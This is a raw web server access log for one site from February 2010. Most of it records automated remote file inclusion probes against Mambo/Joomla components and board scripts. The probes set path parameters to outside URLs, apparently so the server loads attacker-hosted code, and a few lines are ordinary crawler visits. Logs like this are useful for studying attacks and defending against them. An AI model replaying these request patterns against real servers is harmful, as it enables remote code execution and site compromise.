213.239.230.130 - - [19/Feb/2010:07:34:00 -0800] "GET /logs/access_100210.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:34:00 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:34:00 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [19/Feb/2010:07:34:11 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
69.13.69.245 - - [19/Feb/2010:07:34:11 -0800] "GET /logs/access_100204.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
69.13.69.245 - - [19/Feb/2010:07:34:12 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:34:42 -0800] "GET /logs/access_100206.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [19/Feb/2010:07:34:59 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
79.99.44.89 - - [19/Feb/2010:07:35:32 -0800] "GET /logs/access_100123.log%20%20//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [19/Feb/2010:07:35:32 -0800] "GET /component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [19/Feb/2010:07:35:32 -0800] "GET /logs//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [19/Feb/2010:07:35:36 -0800] "GET /logs//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [19/Feb/2010:07:35:36 -0800] "GET /logs/access_100123.log%20%20//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [19/Feb/2010:07:35:37 -0800] "GET /component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:35:41 -0800] "GET /logs/access_100210.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:35:41 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:35:41 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:35:44 -0800] "GET /logs/access_100206.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:36:10 -0800] "GET /logs/access_100129.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:36:17 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:36:17 -0800] "GET /logs/access_100113.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:36:17 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:36:24 -0800] "GET /logs/access_100210.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:37:12 -0800] "GET /logs/access_100206.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [19/Feb/2010:07:37:44 -0800] "GET /pictures/p7 HTTP/1.0" 301 80 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [19/Feb/2010:07:37:47 -0800] "GET /pictures/p7/ HTTP/1.0" 302 7200 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [19/Feb/2010:07:37:49 -0800] "GET /login/needregister.php HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [19/Feb/2010:07:37:50 -0800] "GET /login/registerError.php HTTP/1.0" 200 6018 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [19/Feb/2010:07:37:52 -0800] "GET /style/PuagaDark.css HTTP/1.0" 200 2588 "http://www.puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [19/Feb/2010:07:37:53 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [19/Feb/2010:07:37:55 -0800] "GET /login/dtree.css HTTP/1.0" 404 5258 "http://www.puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:07:39:04 -0800] "GET /component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:07:39:04 -0800] "GET /logs//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:07:39:04 -0800] "GET /logs/access_100123.log//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:07:39:32 -0800] "GET /logs/access_100202.log//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.191.221.86 - - [19/Feb/2010:07:39:36 -0800] "GET /logs/access_100205.log//bbs///////delete_all.php?board_skin=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.191.221.86 - - [19/Feb/2010:07:39:36 -0800] "GET /bbs///////delete_all.php?board_skin=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.191.221.86 - - [19/Feb/2010:07:39:36 -0800] "GET /logs//bbs///////delete_all.php?board_skin=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.191.221.86 - - [19/Feb/2010:07:40:25 -0800] "GET /logs/access_100125.log//bbs///////delete_all.php?board_skin=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:07:41:36 -0800] "GET /ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:07:41:36 -0800] "GET /logs/ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:07:41:36 -0800] "GET /logs/access_100121.log/ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:07:41:57 -0800] "GET /logs/access_100126.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:07:41:57 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:07:42:01 -0800] "GET /logs/access_100201.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:07:42:20 -0800] "GET /logs/access_100129.log/ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:07:42:38 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:07:42:38 -0800] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:07:42:38 -0800] "GET /logs/access_100126.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:07:42:44 -0800] "GET /logs/access_100201.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:07:43:39 -0800] "GET /logs//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:07:43:40 -0800] "GET /component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:07:43:40 -0800] "GET /logs/access_100123.log//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:07:43:50 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:07:44:09 -0800] "GET /logs/access_100201.log/components/com_forum/download.php?phpbb_root_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:07:44:09 -0800] "GET /logs/access.log/components/com_forum/download.php?phpbb_root_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:07:44:12 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:07:44:29 -0800] "GET /logs/access_100202.log//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:07:44:54 -0800] "GET /logs/access.log%20%20/components/com_forum/download.php?phpbb_root_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:07:44:54 -0800] "GET /logs/access_100201.log%20%20/components/com_forum/download.php?phpbb_root_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:07:45:07 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:07:45:07 -0800] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:07:45:22 -0800] "GET /logs/access.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:07:46:40 -0800] "GET /logs/access_100205.log%20%20//bbs///////delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:07:46:40 -0800] "GET /bbs///////delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:07:46:40 -0800] "GET /logs//bbs///////delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:46:42 -0800] "GET /logs/access_100206.log///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:46:46 -0800] "GET /logs/access_100206.log///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:48:44 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:48:44 -0800] "GET /logs/access_100205.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:48:45 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:07:49:01 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:07:49:01 -0800] "GET /logs/access.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:07:49:01 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:50:25 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:50:26 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:50:26 -0800] "GET /logs/access_100205.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:07:50:45 -0800] "GET /logs/access_100211.log/components/com_forum/download.php?phpbb_root_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:07:51:18 -0800] "GET /logs/access_100127.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:07:52:10 -0800] "GET /logs/access.log%20%20//bbs///////delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [19/Feb/2010:07:52:59 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [19/Feb/2010:07:52:59 -0800] "GET /logs/access_100119.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [19/Feb/2010:07:52:59 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [19/Feb/2010:07:52:59 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.sanvan.net/new/id1?? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:54:35 -0800] "GET /logs/access_100203.log///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:54:43 -0800] "GET /logs/access_100205.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:55:11 -0800] "GET /logs/access_100203.log///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:56:17 -0800] "GET /logs/access_100205.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:56:58 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:56:58 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:56:58 -0800] "GET /logs/access_100210.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:57:02 -0800] "GET /logs/access_100210.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:57:02 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:57:02 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [19/Feb/2010:07:57:32 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [19/Feb/2010:07:57:32 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [19/Feb/2010:07:57:33 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.sanvan.net/new/id1?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:57:38 -0800] "GET /logs/access_100206.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [19/Feb/2010:07:57:41 -0800] "GET /logs/access_100119.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:07:57:54 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:07:57:54 -0800] "GET /logs/access_100125.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:07:57:55 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
